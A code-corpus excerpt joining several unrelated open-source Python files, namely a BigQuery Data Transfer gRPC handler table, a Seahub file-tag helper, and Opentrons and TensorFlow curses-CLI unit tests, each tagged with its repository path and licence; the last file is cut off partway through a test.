request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ScheduleTransferRunsRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ScheduleTransferRunsResponse.SerializeToString,
),
'GetTransferRun': grpc.unary_unary_rpc_method_handler(
servicer.GetTransferRun,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.GetTransferRunRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_transfer__pb2.TransferRun.SerializeToString,
),
'DeleteTransferRun': grpc.unary_unary_rpc_method_handler(
servicer.DeleteTransferRun,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.DeleteTransferRunRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'ListTransferRuns': grpc.unary_unary_rpc_method_handler(
servicer.ListTransferRuns,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferRunsRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferRunsResponse.SerializeToString,
),
'ListTransferLogs': grpc.unary_unary_rpc_method_handler(
servicer.ListTransferLogs,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferLogsRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.ListTransferLogsResponse.SerializeToString,
),
'CheckValidCreds': grpc.unary_unary_rpc_method_handler(
servicer.CheckValidCreds,
request_deserializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CheckValidCredsRequest.FromString,
response_serializer=google_dot_cloud_dot_bigquery_dot_datatransfer__v1_dot_proto_dot_datatransfer__pb2.CheckValidCredsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.cloud.bigquery.datatransfer.v1.DataTransferService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| jonparrott/google-cloud-python | bigquery_datatransfer/google/cloud/bigquery_datatransfer_v1/proto/datatransfer_pb2_grpc.py | Python | apache-2.0 | 16,649 |
# -*- coding: utf-8 -*-
import logging
import posixpath
from collections import defaultdict
from seaserv import seafile_api
from seahub.base.templatetags.seahub_tags import email2nickname, email2contact_email
from seahub.utils.timeutils import timestamp_to_isoformat_timestr
from seahub.file_tags.models import FileTags
# Get an instance of a logger
logger = logging.getLogger(__name__)
def get_files_tags_in_dir(repo_id, path):
# Get QuerySet from file_tags, repo_tags and file_uuid_map
files_tags = FileTags.objects.get_dir_file_tags(repo_id, path).select_related('repo_tag', 'file_uuid')
files_tags_in_dir = defaultdict(list)
for file_tag in files_tags:
file_tag_dict = dict()
file_tag_dict['file_tag_id'] = file_tag.pk
file_tag_dict['repo_tag_id'] = file_tag.repo_tag.pk
file_tag_dict['tag_name'] = file_tag.repo_tag.name
file_tag_dict['tag_color'] = file_tag.repo_tag.color
files_tags_in_dir[file_tag.file_uuid.filename].append(file_tag_dict)
return files_tags_in_dir
def get_tagged_files(repo, repo_tag_id):
# get tagged files
tagged_file_objs = FileTags.objects.filter(
repo_tag__id=repo_tag_id).select_related('repo_tag', 'file_uuid')
tagged_files = defaultdict(list)
for tagged_file_obj in tagged_file_objs:
file_tag_id = tagged_file_obj.pk
parent_path = tagged_file_obj.file_uuid.parent_path
filename = tagged_file_obj.file_uuid.filename
file_path = posixpath.join(parent_path, filename)
tagged_file = dict()
file_obj = seafile_api.get_dirent_by_path(repo.store_id, file_path)
if not file_obj:
exception = "Can't find tagged file. Repo_id: %s, Path: %s." % (repo.id, file_path)
logger.warning(exception)
tagged_file["file_deleted"] = True
tagged_file["file_tag_id"] = file_tag_id
tagged_file["filename"] = filename
tagged_files["tagged_files"].append(tagged_file)
continue
tagged_file["file_tag_id"] = file_tag_id
tagged_file["parent_path"] = parent_path
tagged_file["filename"] = filename
tagged_file["size"] = file_obj.size
tagged_file["mtime"] = file_obj.mtime
tagged_file["last_modified"] = timestamp_to_isoformat_timestr(file_obj.mtime)
tagged_file["modifier_email"] = file_obj.modifier
tagged_file["modifier_contact_email"] = email2contact_email(file_obj.modifier)
tagged_file["modifier_name"] = email2nickname(file_obj.modifier)
tagged_files["tagged_files"].append(tagged_file)
return tagged_files
| miurahr/seahub | seahub/utils/file_tags.py | Python | apache-2.0 | 2,647 |
import pytest
from opentrons.protocol_api import ProtocolContext
from opentrons.protocols.execution import execute, execute_python
from opentrons.protocols.parse import parse
def test_api2_runfunc():
def noargs():
pass
with pytest.raises(SyntaxError):
execute_python._runfunc_ok(noargs)
def twoargs(a, b):
pass
with pytest.raises(SyntaxError):
execute_python._runfunc_ok(twoargs)
def two_with_default(a, b=2):
pass
# making sure this doesn't raise
execute_python._runfunc_ok(two_with_default)
def one_with_default(a=2):
pass
# shouldn't raise
execute_python._runfunc_ok(one_with_default)
def starargs(*args):
pass
# shouldn't raise
execute_python._runfunc_ok(starargs)
@pytest.mark.parametrize('protocol_file', ['testosaur_v2.py'])
def test_execute_ok(protocol, protocol_file, loop):
proto = parse(protocol.text, protocol.filename)
ctx = ProtocolContext(loop)
execute.run_protocol(proto, context=ctx)
def test_bad_protocol(loop):
ctx = ProtocolContext(loop)
no_args = parse('''
metadata={"apiLevel": "2.0"}
def run():
pass
''')
with pytest.raises(execute_python.MalformedProtocolError) as e:
execute.run_protocol(no_args, context=ctx)
assert "Function 'run()' does not take any parameters" in str(e.value)
many_args = parse('''
metadata={"apiLevel": "2.0"}
def run(a, b):
pass
''')
with pytest.raises(execute_python.MalformedProtocolError) as e:
execute.run_protocol(many_args, context=ctx)
assert "must be called with more than one argument" in str(e.value)
def test_proto_with_exception(loop):
ctx = ProtocolContext(loop)
exc_in_root = '''metadata={"apiLevel": "2.0"}
def run(ctx):
raise Exception("hi")
'''
protocol = parse(exc_in_root)
with pytest.raises(execute_python.ExceptionInProtocolError) as e:
execute.run_protocol(
protocol,
context=ctx)
assert 'Exception [line 4]: hi' in str(e.value)
nested_exc = '''
import ast
def this_throws():
raise Exception("hi")
def run(ctx):
this_throws()
metadata={"apiLevel": "2.0"};
'''
protocol = parse(nested_exc)
with pytest.raises(execute_python.ExceptionInProtocolError) as e:
execute.run_protocol(
protocol,
context=ctx)
assert '[line 5]' in str(e.value)
assert 'Exception [line 5]: hi' in str(e.value)
| Opentrons/labware | api/tests/opentrons/protocols/execution/test_execute_python.py | Python | apache-2.0 | 2,472 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests of the curses-based CLI."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import curses
import numpy as np
from tensorflow.python.debug.cli import curses_ui
from tensorflow.python.debug.cli import debugger_cli_common
from tensorflow.python.debug.cli import tensor_format
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
def string_to_codes(cmd):
return [ord(c) for c in cmd]
def codes_to_string(cmd_code):
# Omit non-ASCII key codes.
return "".join([chr(code) for code in cmd_code if code < 256])
class MockCursesUI(curses_ui.CursesUI):
"""Mock subclass of CursesUI that bypasses actual terminal manipulations."""
def __init__(self, height, width, command_sequence=None):
self._height = height
self._width = width
self._command_sequence = command_sequence
self._command_counter = 0
# The mock class has no actual textbox. So use this variable to keep
# track of what's entered in the textbox on creation.
self._curr_existing_command = ""
# Observers for test.
# Observers of screen output.
self.unwrapped_outputs = []
self.wrapped_outputs = []
self.scroll_messages = []
self.output_array_pointer_indices = []
self.output_pad_rows = []
# Observers of command textbox.
self.existing_commands = []
# Observer for tab-completion candidates.
self.candidates_lists = []
# Observer for toast messages.
self.toasts = []
curses_ui.CursesUI.__init__(self)
# Below, override the _screen_ prefixed member methods that interact with the
# actual terminal, so that the mock can run in a terminal-less environment.
# TODO(cais): Search for a way to have a mock terminal object that behaves
# like the actual terminal, so that we can test the terminal interaction
# parts of the CursesUI class.
def _screen_init(self):
pass
def _screen_refresh_size(self):
self._max_y = self._height
self._max_x = self._width
def _screen_launch(self):
pass
def _screen_terminate(self):
pass
def _screen_refresh(self):
pass
def _screen_create_command_window(self):
pass
def _screen_create_command_textbox(self, existing_command):
"""Override to insert observer of existing commands.
Used in testing of history navigation and tab completion.
Args:
existing_command: Command string entered to the textbox at textbox
creation time. Note that the textbox does not actually exist in this
mock subclass. This method only keeps track of and records the state.
"""
self.existing_commands.append(existing_command)
self._curr_existing_command = existing_command
def _screen_new_output_pad(self, rows, cols):
return "mock_pad"
def _screen_add_line_to_output_pad(self, pad, row, txt, color_segments=None):
pass
def _screen_draw_text_line(self, row, line, attr=curses.A_NORMAL, color=None):
pass
def _screen_scroll_output_pad(self, pad, viewport_top, viewport_left,
screen_location_top, screen_location_left,
screen_location_bottom, screen_location_right):
pass
def _screen_get_user_command(self):
command = self._command_sequence[self._command_counter]
self._command_key_counter = 0
for c in command:
if c == curses.KEY_RESIZE:
# Special case for simulating a terminal resize event in curses.
self._height = command[1]
self._width = command[2]
self._on_textbox_keypress(c)
self._command_counter += 1
return ""
y = self._on_textbox_keypress(c)
self._command_key_counter += 1
if y == curses_ui.CursesUI.CLI_TERMINATOR_KEY:
break
self._command_counter += 1
# Take into account pre-existing string automatically entered on textbox
# creation.
return self._curr_existing_command + codes_to_string(command)
def _screen_gather_textbox_str(self):
return codes_to_string(self._command_sequence[self._command_counter]
[:self._command_key_counter])
def _scroll_output(self, direction, line_index=None):
"""Override to observe screen output.
This method is invoked after every command that generates a new screen
output and after every keyboard triggered screen scrolling. Therefore
it is a good place to insert the observer.
Args:
direction: which direction to scroll.
line_index: (int or None) Optional line index to scroll to. See doc string
of the overridden method for more information.
"""
curses_ui.CursesUI._scroll_output(self, direction, line_index=line_index)
self.unwrapped_outputs.append(self._curr_unwrapped_output)
self.wrapped_outputs.append(self._curr_wrapped_output)
self.scroll_messages.append(self._scroll_info)
self.output_array_pointer_indices.append(self._output_array_pointer_indices)
self.output_pad_rows.append(self._output_pad_row)
def _display_candidates(self, candidates):
curses_ui.CursesUI._display_candidates(self, candidates)
self.candidates_lists.append(candidates)
def _toast(self, message, color=None, line_index=None):
curses_ui.CursesUI._toast(self, message, color=color, line_index=line_index)
self.toasts.append(message)
class CursesTest(test_util.TensorFlowTestCase):
_EXIT = string_to_codes("exit\n")
def _babble(self, args, screen_info=None):
ap = argparse.ArgumentParser(
description="Do babble.", usage=argparse.SUPPRESS)
ap.add_argument(
"-n",
"--num_times",
dest="num_times",
type=int,
default=60,
help="How many times to babble")
ap.add_argument(
"-l",
"--line",
dest="line",
type=str,
default="bar",
help="The content of each line")
parsed = ap.parse_args(args)
return debugger_cli_common.RichTextLines([parsed.line] * parsed.num_times)
def _print_ones(self, args, screen_info=None):
ap = argparse.ArgumentParser(
description="Print all-one matrix.", usage=argparse.SUPPRESS)
ap.add_argument(
"-s",
"--size",
dest="size",
type=int,
default=3,
help="Size of the matrix. For example, of the value is 3, "
"the matrix will have shape (3, 3)")
parsed = ap.parse_args(args)
m = np.ones([parsed.size, parsed.size])
return tensor_format.format_tensor(m, "m")
def testInitialization(self):
ui = MockCursesUI(40, 80)
self.assertEqual(0, ui._command_pointer)
self.assertEqual([], ui._active_command_history)
self.assertEqual("", ui._pending_command)
def testRunUIExitImmediately(self):
"""Make sure that the UI can exit properly after launch."""
ui = MockCursesUI(40, 80, command_sequence=[self._EXIT])
ui.run_ui()
# No screen output should have happened.
self.assertEqual(0, len(ui.unwrapped_outputs))
def testRunUIEmptyCommand(self):
"""Issue an empty command then exit."""
ui = MockCursesUI(40, 80, command_sequence=[[], self._EXIT])
ui.run_ui()
# Empty command should not lead to any screen output.
self.assertEqual(0, len(ui.unwrapped_outputs))
def testRunUIInvalidCommandPrefix(self):
"""Handle an unregistered command prefix."""
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("foo\n"), self._EXIT])
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["ERROR: Invalid command prefix \"foo\""],
ui.unwrapped_outputs[0].lines)
# TODO(cais): Add explanation for the 35 extra lines.
self.assertEqual(["ERROR: Invalid command prefix \"foo\""],
ui.wrapped_outputs[0].lines[:1])
# A single line of output should not have caused scrolling.
self.assertEqual("-" * 80, ui.scroll_messages[0])
def testRunUIInvalidCommandSyntax(self):
"""Handle a command with invalid syntax."""
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble -z\n"), self._EXIT])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(
["Syntax error for command: babble", "For help, do \"help babble\""],
ui.unwrapped_outputs[0].lines)
def testRunUIScrollTallOutputPageDownUp(self):
"""Scroll tall output with PageDown and PageUp."""
# Use PageDown and PageUp to scroll back and forth a little before exiting.
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble\n"), [curses.KEY_NPAGE] * 2 +
[curses.KEY_PPAGE] + self._EXIT])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(4, len(ui.wrapped_outputs))
self.assertEqual(4, len(ui.scroll_messages))
# Before scrolling.
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
# Initial scroll: At the top.
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
# After 1st scrolling (PageDown).
# The screen output shouldn't have changed. Only the viewport should.
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
self.assertIn("Scroll (PgDn/PgUp): 1.69%", ui.scroll_messages[1])
# After 2nd scrolling (PageDown).
self.assertIn("Scroll (PgDn/PgUp): 3.39%", ui.scroll_messages[2])
# After 3rd scrolling (PageUp).
self.assertIn("Scroll (PgDn/PgUp): 1.69%", ui.scroll_messages[3])
def testCutOffTooManyOutputLines(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble -n 20\n"), self._EXIT])
# Modify max_output_lines so that this test doesn't use too much time or
# memory.
ui.max_output_lines = 10
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(["bar"] * 10 + ["Output cut off at 10 lines!"],
ui.wrapped_outputs[0].lines[:11])
def testRunUIScrollTallOutputEndHome(self):
"""Scroll tall output with PageDown and PageUp."""
# Use End and Home to scroll a little before exiting to test scrolling.
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble\n"),
[curses.KEY_END] * 2 + [curses.KEY_HOME] + self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(4, len(ui.wrapped_outputs))
self.assertEqual(4, len(ui.scroll_messages))
# Before scrolling.
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
# Initial scroll: At the top.
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
# After 1st scrolling (End).
self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[1])
# After 2nd scrolling (End).
self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[2])
# After 3rd scrolling (Hhome).
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[3])
def testRunUIWithInitCmd(self):
"""Run UI with an initial command specified."""
ui = MockCursesUI(40, 80, command_sequence=[self._EXIT])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui(init_command="babble")
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
def testCompileHelpWithoutHelpIntro(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"), self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[0].lines[:4])
def testCompileHelpWithHelpIntro(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"), self._EXIT])
help_intro = ["This is a curses UI.", "All it can do is 'babble'.", ""]
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.set_help_intro(help_intro)
ui.run_ui()
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(
help_intro + ["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[0].lines[:7])
def testCommandHistoryNavBackwardOnce(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
[curses.KEY_UP], # Hit Up and Enter.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(2, len(ui.unwrapped_outputs))
for i in [0, 1]:
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[i].lines[:4])
def testCommandHistoryNavBackwardTwice(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
string_to_codes("babble\n"),
[curses.KEY_UP],
[curses.KEY_UP], # Hit Up twice and Enter.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(3, len(ui.unwrapped_outputs))
# The 1st and 3rd outputs are for command "help".
for i in [0, 2]:
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[i].lines[:4])
# The 2nd output is for command "babble".
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
def testCommandHistoryNavBackwardOverLimit(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
string_to_codes("babble\n"),
[curses.KEY_UP],
[curses.KEY_UP],
[curses.KEY_UP], # Hit Up three times and Enter.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(3, len(ui.unwrapped_outputs))
# The 1st and 3rd outputs are for command "help".
for i in [0, 2]:
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[i].lines[:4])
# The 2nd output is for command "babble".
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
def testCommandHistoryNavBackwardThenForward(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
string_to_codes("babble\n"),
[curses.KEY_UP],
[curses.KEY_UP],
[curses.KEY_DOWN], # Hit Up twice and Down once.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(3, len(ui.unwrapped_outputs))
# The 1st output is for command "help".
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[0].lines[:4])
# The 2nd and 3rd outputs are for command "babble".
for i in [1, 2]:
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[i].lines)
def testCommandHistoryPrefixNavBackwardOnce(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 1\n"),
string_to_codes("babble -n 10\n"),
string_to_codes("help\n"),
string_to_codes("b") + [curses.KEY_UP], # Navigate with prefix.
string_to_codes("\n"),
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(["bar"], ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[1].lines)
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[2].lines[:4])
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[3].lines)
def testTerminalResize(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble\n"),
[curses.KEY_RESIZE, 100, 85], # Resize to [100, 85]
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The resize event should have caused a second screen output event.
self.assertEqual(2, len(ui.unwrapped_outputs))
self.assertEqual(2, len(ui.wrapped_outputs))
self.assertEqual(2, len(ui.scroll_messages))
# The 1st and 2nd screen outputs should be identical (unwrapped).
self.assertEqual(ui.unwrapped_outputs[0], ui.unwrapped_outputs[1])
# The 1st scroll info should contain scrolling, because the screen size
# is less than the number of lines in the output.
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
def testTabCompletionWithCommonPrefix(self):
# Type "b" and trigger tab completion.
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("b\t"), string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["ba"])
ui.run_ui()
# The automatically registered exit commands "exit" and "quit" should not
# appear in the tab completion candidates because they don't start with
# "b".
self.assertEqual([["ba", "babble"]], ui.candidates_lists)
# "ba" is a common prefix of the two candidates. So the "ba" command should
# have been issued after the Enter.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
def testTabCompletionEmptyTriggerWithoutCommonPrefix(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["a"])
# Use a different alias "a" instead.
ui.run_ui()
# The manually registered command, along with the automatically registered
# exit commands should appear in the candidates.
self.assertEqual([["a", "babble", "exit", "h", "help", "quit"]],
ui.candidates_lists)
# The two candidates have no common prefix. So no command should have been
# issued.
self.assertEqual(0, len(ui.unwrapped_outputs))
self.assertEqual(0, len(ui.wrapped_outputs))
self.assertEqual(0, len(ui.scroll_messages))
def testTabCompletionNonemptyTriggerSingleCandidate(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("b\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["a"])
ui.run_ui()
# There is only one candidate, so no candidates should have been displayed.
# Instead, the completion should have been automatically keyed in, leading
# to the "babble" command being issue.
self.assertEqual([[]], ui.candidates_lists)
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
def testTabCompletionNoMatch(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("c\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["a"])
ui.run_ui()
# Only the invalid command "c" should have been issued.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["ERROR: Invalid command prefix \"c\""],
ui.unwrapped_outputs[0].lines)
self.assertEqual(["ERROR: Invalid command prefix \"c\""],
ui.wrapped_outputs[0].lines[:1])
def testTabCompletionOneWordContext(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.register_tab_comp_context(["babble", "b"], ["10", "20", "30", "300"])
ui.run_ui()
self.assertEqual([["30", "300"]], ui.candidates_lists)
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 30, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 30, ui.wrapped_outputs[0].lines[:30])
def testTabCompletionTwice(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 1\t"), # Trigger tab completion.
string_to_codes("2\t"), # With more prefix, tab again.
string_to_codes("3\n"),
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.register_tab_comp_context(["babble", "b"], ["10", "120", "123"])
ui.run_ui()
# There should have been two different lists of candidates.
self.assertEqual([["10", "120", "123"], ["120", "123"]],
ui.candidates_lists)
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 123, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 123, ui.wrapped_outputs[0].lines[:123])
def testRegexSearch(self):
"""Test regex search."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/(b|r)\n"), # Regex search and highlight.
string_to_codes("/a\n"), # Regex search and highlight.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The unwrapped (original) output should never have any highlighting.
self.assertEqual(3, len(ui.unwrapped_outputs))
for i in range(3):
self.assertEqual(["bar"] * 3, ui.unwrapped_outputs[i].lines)
self.assertEqual({}, ui.unwrapped_outputs[i].font_attr_segs)
# The wrapped outputs should show highlighting depending on the regex.
self.assertEqual(3, len(ui.wrapped_outputs))
# The first output should have no highlighting.
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)
# The second output should have highlighting for "b" and "r".
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
for i in range(3):
self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
ui.wrapped_outputs[1].font_attr_segs[i])
# The third output should have highlighting for "a" only.
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
for i in range(3):
self.assertEqual([(1, 2, "black_on_white")],
ui.wrapped_outputs[2].font_attr_segs[i])
def testRegexSearchContinuation(self):
"""Test continuing scrolling down to next regex match."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/(b|r)\n"), # Regex search and highlight.
string_to_codes("/\n"), # Continue scrolling down: 1st time.
string_to_codes("/\n"), # Continue scrolling down: 2nd time.
string_to_codes("/\n"), # Continue scrolling down: 3rd time.
string_to_codes("/\n"), # Continue scrolling down: 4th time.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The 1st output is for the non-searched output. The other three are for
# the searched output. Even though continuation search "/" is performed
# four times, there should be only three searched outputs, because the
# last one has exceeded the end.
self.assertEqual(4, len(ui.unwrapped_outputs))
for i in range(4):
self.assertEqual(["bar"] * 3, ui.unwrapped_outputs[i].lines)
self.assertEqual({}, ui.unwrapped_outputs[i].font_attr_segs)
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)
for j in range(1, 4):
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[j].lines[:3])
self.assertEqual({
0: [(0, 1, "black_on_white"), (2, 3, "black_on_white")],
1: [(0, 1, "black_on_white"), (2, 3, "black_on_white")],
2: [(0, 1, "black_on_white"), (2, 3, "black_on_white")]
}, ui.wrapped_outputs[j].font_attr_segs)
self.assertEqual([0, 0, 1, 2], ui.output_pad_rows)
def testRegexSearchUnderLineWrapping(self):
ui = MockCursesUI(
40,
5, # Use a narrow window to trigger line wrapping
command_sequence=[
string_to_codes("babble -n 3 -l foo-bar-baz-qux\n"),
string_to_codes("/foo\n"), # Regex search and highlight.
string_to_codes("/\n"), # Continue scrolling down: 1st time.
string_to_codes("/\n"), # Continue scrolling down: 2nd time.
string_to_codes("/\n"), # Continue scrolling down: 3rd time.
string_to_codes("/\n"), # Continue scrolling down: 4th time.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some")
ui.run_ui()
self.assertEqual(4, len(ui.wrapped_outputs))
for wrapped_output in ui.wrapped_outputs:
self.assertEqual(["foo-", "bar-", "baz-", "qux"] * 3,
wrapped_output.lines[0 : 12])
# The scroll location should reflect the line wrapping.
self.assertEqual([0, 0, 4, 8], ui.output_pad_rows)
def testRegexSearchNoMatchContinuation(self):
"""Test continuing scrolling when there is no regex match."""
ui = MockCursesUI(
40,
